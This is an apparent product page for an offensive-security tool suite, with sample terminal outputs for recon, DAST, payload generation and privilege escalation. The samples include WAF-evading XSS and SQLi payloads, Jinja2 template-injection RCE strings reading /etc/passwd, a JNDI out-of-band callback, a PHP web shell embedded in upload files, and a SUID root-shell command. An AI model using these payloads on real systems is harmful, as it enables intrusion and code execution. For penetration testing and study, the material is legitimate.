14+ Professional Security Tools

Security Tools
For Professionals

Everything you need for modern security testing. From reconnaissance to exploitation, powered by AI agents.

Subdomain Finder

Map Your Full Attack Surface

Discover hidden subdomains and expanding your attack surface is the first step in any security assessment. Our Subdomain Finder aggregates data from multiple passive sources including certificate transparency logs, search engines, and historical DNS records to find assets that others miss.

reseac subfinder

> rasec subfinder -d example.com --active

[+] Target: example.com

[+] Sources: crt.sh, hackertarget, alienvault, rapiddns

[INF] Found 14 unique subdomains

[INF] Resolving IP addresses...

[+] admin.example.com [104.21.5.1] (Cloudflare)

[+] dev.example.com [10.0.0.5] (Private IP)

[+] api.example.com [34.201.12.55] (AWS)

[+] staging.example.com [172.16.5.99]

[+] test.example.com [Timed Out]

[INF] Enumeration complete in 2.4s

Bug Bounty HuntersPenetration Testers

URL Finder

Uncover Historical Endpoints

Don't test just what is visible today. The URL Finder digs through internet archives and historical crawls to find forgotten endpoints, backup files, and development parameters that developers thought were gone forever.

rasec url-finder

> rasec url-finder -d tesla.com --since 2023

[+] Fetching from Wayback Machine & Common Crawl...

[+] Parsing results...

[INF] Found 1,240 historical URLs

[high] https://tesla.com/backup.sql

[high] https://tesla.com/api/v1/users?debug=true

[med] https://tesla.com/dev/login.php

[info] https://tesla.com/assets/main.js

> Filtering for '.php' parameters...

[+] Found 42 potential injection points

ResearchersRed Teams

JS Reconnaissance

Extract Secrets from JavaScript

Modern web applications leak massive amounts of information in client-side JavaScript. JS Recon analyzes these files to extract hardcoded API keys, hidden endpoints, AWS credentials, and PII that developers accidentally committed.

Analysis Report

// rasec js-scan results
// Target: https://app.example.com/main.bundle.js

[
  {
    "type": "API Key",
    "value": "api_key_example",
    "line": 1452,
    "confidence": "High"
  },
  {
    "type": "Endpoint",
    "value": "/api/v1/admin/users",
    "line": 402,
    "method": "DELETE"
  },
  {
    "type": "AWS Credential",
    "value": "AKIA...",
    "line": 89,
    "confidence": "Medium"
  }
]

Web Security TestersCode Reviewers

Popular

DAST Scanner

AI-Powered Dynamic Analysis

Our flagship Dynamic Application Security Testing (DAST) scanner. It doesn't just fuzz blindly—it understands application logic. Using AI, it navigates your application, identifies complex state-dependent vulnerabilities, and validates findings to ensure zero false positives.

DAST Scan

> rasec scan --url https://shop.example.com --deep

[+] Starting active DAST scan

[+] Using headless browser for SPA crawling

[INF] Crawled 45 endpoints

[INF] Testing for SQLi, XSS, SSRF...

[CRITICAL] Reflected XSS found

> Payload: <img src=x onerror=alert(1)>

> URL: https://shop.example.com/search?q=...

[HIGH] SQL Injection (Time-based)

> URL: https://shop.example.com/api/products?id=1

> Payload: 1' WAITFOR DELAY '0:0:5'--

[+] Scan finished violations found: 2 Critical, 1 High

DevSecOpsAppSec Engineers

Popular

SAST Analyzer

Find Bugs in Source Code

Secure your code before it ships. Our Static Application Security Testing (SAST) tool analyzes source code to identify insecure patterns, hardcoded secrets, and logic flaws without executing the application.

auth.py analysis

def login(username, password):
    # [CRITICAL] SQL Injection detected
    # User input is directly concatenated into query
    query = "SELECT * FROM users WHERE user = '" + username + "'"
    
    # Recommendation: Use parameterized queries
    # cursor.execute("SELECT * FROM users WHERE user = %s", (username,))
    
    db.execute(query)
    
    # [HIGH] Hardcoded Secret
    # Never commit secrets to version control
    api_key = "example_api_key_1234567890"

DevelopersSecurity Auditors

Security Headers

Harden Your HTTP Response

Missing security headers leaves users vulnerable to XSS, clickjacking, and other client-side attacks. This tool analyzes your server response headers and provides a grade along with actionable recommendations to implement HSTS, CSP, and more.

Header Check

> rasec headers --url https://target.com

[+] Analyzing HTTP response headers...

[F] Grade: F

----------------------------------------

[x] Strict-Transport-Security (HSTS) missing

[x] Content-Security-Policy (CSP) missing

[x] X-Frame-Options missing

[x] X-Content-Type-Options missing

[!] Vulnerable to:

- Clickjacking

- MIME Sniffing attacks

- Protocol Downgrade attacks

[+] Recommendations generated

SysAdminsDevOps

Payload Forge

Bypass WAFs with AI

Stop using generic payload lists that are blocked by every WAF. Payload Forge generates custom, context-aware payloads with specific encoding and obfuscation techniques designed to bypass security filters.

Payload Generator

> rasec forge --type xss --evasion waf-bypass

[+] Generating context-aware payloads...

[+] Applying WAF evasion mutations...

1. <svg/onload=confirm(1)>

2. <img src=x onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000049&#0000041>

3. {{constructor.constructor('alert(1)')()}} (Angular bypass)

4. j%0Aav%0Aascr%0Aipt:alert(1)

[+] 4 optimized payloads generated

PentestersRed Teams

SSTI Forge

Template Injection Generator

Server-Side Template Injection is a critical vulnerability often leading to RCE. SSTI Forge generates engine-specific payloads to detect and exploit template engines across Python, Java, PHP, and Ruby stacks.

SSTI Generator

> rasec ssti --engine jinja2 --action rce

[+] Targeted Engine: Jinja2 (Python)

[+] Payload Type: Remote Code Execution

[1] {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

[2] {{ config.__class__.__init__.__globals__['os'].popen('ls -la').read() }}

[3] {{ "".__class__.__mro__[1].__subclasses__()[407]("cat /etc/passwd",shell=True,stdout=-1).communicate()[0].strip() }}

[+] Use with caution!

ResearchersWeb Testers

OOB Helper

Blind Interaction Testing

Detect invisible vulnerabilities. OOB Helper generates payloads designed to trigger out-of-band network interactions (DNS/HTTP), allowing you to detect Blind XSS, Blind SQLi, and SSRF where no response is returned to the user.

OOB Callbacks

> rasec interact --protocol dns

[+] Generated OOB Interaction Payload

Payload: ${jndi:dns://x4d9f.oob.rasec.dev/a}

Listener: https://oob.rasec.dev/monitor/x4d9f

[WAITING] Listening for callbacks...

[+] DNS Query received from 1.2.3.4

Query: a.x4d9f.oob.rasec.dev

Type: A (IPv4)

Time: 2023-10-25 10:45:12

Advanced CheckersRed Teams

DOM XSS Finder

Client-Side Flow Analysis

DOM-based XSS is invisible to server-side scanners. This tool analyzes client-side JavaScript to identify dangerous data flows from user inputs (sources) to execution functions (sinks) like innerHTML or eval.

Source Analysis

// Source: location.hash
// Sink: innerHTML

function trackUser() {
    // [Danger] Direct flow from URL hash to HTML
    var unsafe = decodeURIComponent(window.location.hash);
    
    // Sink
    document.getElementById('welcome').innerHTML = unsafe;
}

// Exploit Vector:
// https://site.com#<img src=x onerror=alert(1)>

Security ResearchersFrontend Devs

JWT Analyzer

Token Security Assessment

JSON Web Tokens are the standard for modern auth, but implementation flaws are common. Analyze your tokens for weak signatures, algorithm confusion ("none" algo), and information leakage.

Token Decoded

{
  "header": {
    "alg": "HS256",
    "typ": "JWT"
  },
  "payload": {
    "sub": "1234567890",
    "name": "John Doe",
    "admin": false,
    "iat": 1516239022
  },
  "analysis": [
    {
      "severity": "High",
      "issue": "Weak Secret",
      "desc": "Signature verified with common secret 'secret123'"
    },
    {
      "severity": "Critical",
      "issue": "None Algo",
      "desc": "Token accepted with 'alg': 'none'"
    }
  ]
}

API Security Testers

File Upload Auditor

Bypass Upload Filters

File upload features are high-risk entry points. This tool generates test files designed to bypass extension filters, magic byte checks, and MIME type validation to test for RCE via upload.

Upload Test

> rasec upload-gen --vector polyglot

[+] Generating upload bypass files...

[1] shell.php.jpg (Double Extension)

[2] shell.php%00.jpg (Null Byte)

[3] image.png (Polyglot: Valid PNG + PHP Code)

> Magic Bytes: 89 50 4E 47 ...

> Payload: <?php system($_GET['c']); ?> injected in IDAT chunk

[+] Files saved to ./output

PentestersQA Engineers

PrivEsc Pathfinder

Escalate Your Privileges

You have a shell, now what? PrivEsc Pathfinder provides a curated checklist of commands and techniques to enumerate the system, find misconfigurations, and elevate from a low-level user to root/admin.

PrivEsc Scan

> rasec privesc --platform linux

[+] Enumerating escalation vectors...

[HIGH] SUID Binary Found

Binary: /usr/bin/find

Permissions: -rwsr-xr-x

Exploit: find . -exec /bin/sh -p \; -quit

[MED] Writable /etc/passwd

Permissions: -rw-rw-rw-

Exploit: Add root user manually

[LOW] Kernel Version

Release: 3.13.0 (DirtyCow Vulnerable)

[+] 3 potential paths to root identified

Red TeamsCTF Players

Popular

Security AI Assistant

Expert Advice on Demand

Stuck on a vulnerability? Ask our AI Security Assistant. Trained on thousands of security reports and methodologies, it can explain complex concepts, suggest attack vectors, and help write remediation reports.

AI Response

**User:** How do I fix the SQL injection in my login?

**RaSEC AI:** 
The vulnerability exists because user input is concatenated directly into the SQL string.

**Remediation:**
Use parameterized queries (Prepared Statements). This ensures the database treats user input as data, not executable code.

```python
# VULNERABLE:
# query = "SELECT * FROM users WHERE user = '" + username + "'"

# SECURE:
cursor.execute("SELECT * FROM users WHERE user = %s", (username,))
```

Would you like me to scan your codebase for other instances of this pattern?

Everyone

Not Sure Where to Start?

Try our AI Security Assistant. Describe your target and let AI guide you to the right tools.

Ask AI Assistant

Security ToolsFor Professionals

Subdomain Finder

URL Finder

JS Reconnaissance

DAST Scanner

SAST Analyzer

Security Headers

Payload Forge

SSTI Forge

OOB Helper

DOM XSS Finder

JWT Analyzer

File Upload Auditor

PrivEsc Pathfinder

Security AI Assistant

Not Sure Where to Start?

Security ToolsFor Professionals

Subdomain Finder

URL Finder

JS Reconnaissance

DAST Scanner

SAST Analyzer

Security Headers

Payload Forge

SSTI Forge

OOB Helper

DOM XSS Finder

JWT Analyzer

File Upload Auditor

PrivEsc Pathfinder

Security AI Assistant

Not Sure Where to Start?

Security Tools
For Professionals

Security Tools
For Professionals